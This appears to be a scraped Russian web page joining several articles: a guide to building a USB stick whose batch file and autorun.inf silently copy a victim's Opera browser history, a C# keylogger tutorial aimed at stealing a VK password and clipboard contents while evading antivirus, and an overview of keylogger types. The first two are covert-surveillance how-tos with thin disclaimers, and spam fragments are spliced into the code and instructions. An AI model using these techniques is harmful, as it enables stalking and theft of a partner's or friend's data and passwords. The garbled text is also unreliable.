Hard: Флешка для «шпиона»
Бывают в жизни ситуации, когда нужно добраться до некой информации, а доступа к этому компьютеру вы не имеете. Цель может любая, например, узнать с кем общается любимая девушка в интернете, или стянуть курсовую у друга — неважно.
Выход из такой ситуации намного проще, чем кажется на первый взгляд.
Необходимо написать «батник» (.bat — файл)
Файл с расширением « .bat» — это текстовый файл с набором команд интерпритатора. Для операционных систем семейства NT файл может иметь расширение – «.cmd». Работать с такими файлами можно при помощи любого текстового редактора (блокнот Word и т.д.). После написания такого файла сливаем его на флешку, а флешку в свою очередь даем под каким либо предлогом «жертве». После подключения к компьютеру батник запустится и скопирует необходимую информацию на флешку.
Итак, переходим к делу: запускаем блокнот, и в нем напишем следующее:
C:
chdir C:Program FilesOperaProfilecache4
f:rar.exe a –r cache4> nul
5 ШПИОНСКИХ ЛАЙФХАКОВ//НЕВИДИМЫЕ ЧЕРНИЛА/ШПИОНСКИЕ ПРОГРАММЫ ДЛЯ ANDROID/лайфхаки для шпионов
copy cache4.rar f:555 > nul
del cache4.rar >nul
C:Program FilesOperaProfilecache4 – папка которую нам нужно скопировать (в данном случае это папка куда Опера сохраняет историю)
f:rar.exe a –r cache4> nul – запуск архиватора
.
copy cache4.rar f:555 > nul – адрес куда копируем .
del cache4.rar >nul – удаление архива на жестком диске.
Как видно из комментариев пути к необходимым файлам вы можете прописывать на свое усмотрение исходя из ваших целей.
Двигаемся далее, заготовка написана для того чтобы этот файл начал работать необходимо сделать четыре вещи:
Пункт первый – сохраняем текстовый документ, например с именем xxxx
Пункт второй – меняем расширение с txt на bat.
Пункт третий – для того чтобы наш свежее созданный батник автоматически запускался необходим еще один файл.
Открываем блокнот и пишем следующее:
[autorun]
ShellExeCute=”xxxx.bat”
Сохраняем документ и переименовываем его на autorun.inf
Пункт четвертый добавляем архиватор. Нам необходим файл с расширением rar.exe (можно взять в папке WinRaR если этот архиватор у вас установлен). Создаем на флешке папку с названием «555». И кидаем на флешку экзешник архиватора, xxxx.bat и autorun.inf
Делаем эти файлы невидимыми и вуаля – флешка готова. Осталось отдать девайс «жертве» и дождаться результата.
ВНИМАНИЕ: вся информация предоставлена в ознакомительных целях и является плодом больного воображения автора. За незаконное использование материала автор ответственности не несет.
Источник: www.rebooting.ru
Как сделать шпиона и следить за паролями
Доброго времени суток, юные хацкеры! Хорошие кейлоггеры с большим функционалом и защитой от детекта антивирусов могут стоить многих денег. Но создание кейлоггера не такая уж сложная вещь, и при желании любой немного разбирающийся в программировании человек может самостоятельно написать свой собственный кейлоггер, который даже не будет палится антивирусами. В сегодняшней статье я покажу, как создать кейлоггер / клавиатурный шпион на C#.
spygo скрытое наблюдение за компьютером (программа-шпион) в реальном времени на Windows 10 8 1 7
Я никого ни к чему не призываю, статья написана в ознакомительных целях!
Создание кейлоггера на C#
Не будем мудрить и ограничимся необходимым минимумом. Допустим, мы хотим заполучить пароль жертвы от ВК и есть возможность физического доступа к компьютеру. При этом:
- мы не беспокоим жертву лишними окнами, иконками в таскбаре, сообщениями об ошибках и подобным;
- мы имеем доступ к целевому компьютеру только однократно и на очень короткий срок;
- мы сможем забирать логи, находясь в той же локальной сети;
- антивирус должен молчать;
- файрвол не учитываем и предполагаем, что мы дадим ему разрешение вручную при подсадке кейлоггера;
- мы не будем пытаться скрывать процесс и только дадим ему неприметное название.
Еще жертва может пользоваться парольным менеджером, тогда в логе мы получим только Ctrl-C и Ctrl-V. На этот случай будем мониторить еще и содержимое буфера обмена.
Писать будем на C# в Visual Studio. Забегая вперед, скажу, что в результате у меня получилось две версии программы — одна работает через перехват WinAPI, другую я про себя называю «костыльной». Но эта менее красивая версия дает другие результаты при проверке антивирусами, поэтому расскажу и о ней.
Теория создания клавиатурного шпиона на C#
Когда вы нажимаете на кнопку, операционная система посылает уведомления тем приложениям, которые хотят об этом узнать. Поэтому самый простой метод перехватить нажатие на клавиатуре — это принимать сообщения о нажатиях клавиш. Если мы этого сделать не можем (например, функция SetWindowsHookEx запрещена антивирусом или еще чем-либо), можно тянуть сырой ввод и без нее.
Есть такая функция — GetAsyncKeyState , которая принимает номер клавиши и позволяет узнать, зажата она или отжата в момент вызова. Собственно, алгоритм действий будет такой: раз в N мс опрашиваем все кнопки и узнаем их состояние, занося нажатые в специальный список. Затем список обрабатываем, учитывая состояние клавиши Caps Lock, Num Lock, Shift, Ctrl и так далее. Полученные данные будут записываться в файл.
Написание кейлоггера на C#
Для начала откроем Visual Studio и создадим новый проект Windows Forms (.NET Framework). Почему именно Windows Forms? Если мы выберем обычное консольное приложение, то при каждом запуске будет создаваться некрасивое черное окошко, а ведь пользователь не хочется беспокоить. Также, пока мы не создали форму (а создавать ее мы и не будем), никаких значков в таскбаре не появится — важная часть скрытой работы. Теперь удаляйте автоматически созданный файл Form1.cs со всеми потрохами и открывайте Program.cs.
Делай Деньги
Здесь нас уже поджидает шаблон программы, но он не будет работать просто так. Первым делом надо убрать строчки 10–12 и 16–18. Теперь меняем объявление метода со static void Main() на static void Main(String[] args). Нужно это для того, чтобы мы могли определить свои аргументы при перезапуске.
Теперь добавим using System.IO; для работы с файлами, System.Runtime.InteropServices для работы с WinAPI и System.Threading для приостановки потока. Если вы не хотите писать костыльный вариант, лучше пропустите этот раздел и сразу переходите к следующему.
Импортируем GetAsyncKeyState из user32.dll:
public static extern int GetAsyncKeyState(Int32 i);
И добавляем собственно логирование нажатий, собирая их по десять штук, чтобы не делать слишком много дисковых операций:
int state = GetAsyncKeyState(i);
Источник: teletype.in
Знакомство с клавиатурными шпионами
Spyware – это термин, определяющий приложения, которые записывают информацию о поведении пользователя в сети Интернет и сообщают об этом своим создателям. Результатом их действия может стать как всплывающая реклама, так и более серьёзные нарушения в безопасности системы, включая кражу информации, запись нажатых клавиш, изменение параметров соединения с глобальной сетью, а также установку «черного хода».
- Аппаратные клавиатурные шпионы.
Это миниатюрные встроенные устройства, расположенные между клавиатурой и компьютером. Из-за их маленьких размеров они часто остаются незамеченными длительное время, однако они требуют физического доступа к оборудованию. Эти устройства могут записывать сотни символов, введенных с клавиатуры, включая почтовые и банковские реквизиты.
- Приложение с перехватывающим механизмом.
Этот тип использует функцию Windows API SetWindowsHookEx(), которая следит за сообщениями о нажатиях клавиш клавиатуры. Обычно spyware-приложение состоит из exe-файла, инициирующего функцию перехвата, и dll-файла, управляющего функциями записи информации. Приложение, вызывающее SetWindowsHookEx(), может перехватить даже самозаполняющиеся пароли.
- Ядерные/драйверные клавиатурные шпионы.
Этот тип клавиатурного шпиона расположен на уровне ядра и получает информацию прямо от вводного устройства (обычно клавиатуры). Он заменяет основное программное обеспечение, обрабатывающее нажатия клавиш. Его можно запрограммировать быть невидимым, используя преимущество выполнения при загрузке системы, до начала выполнения приложений уровня пользователя. Так как программа запускается на уровне ядра, она не может перехватить самозаполняющиеся пароли, потому что эта информация передается на уровне приложений.
Анализ клавиатурного шпиона
Существует большое количество клавиатурных шпионов, включая The Blazing Tools Perfect Keylogger (http://www.blazingtools.com/bpk.html), Spector (http://www.spector.com), Invisible Keylogger Stealth (http://www.amecisco.com/iks2000.htm) и Keysnatch (http://www.fileheaven.com/Keysnatch/download/2975.htm). Большинство из них схожи по своей функциональности и возможностям. Поэтому в наших примерах мы будем рассматривать клавиатурный шпион от Blazing Tools.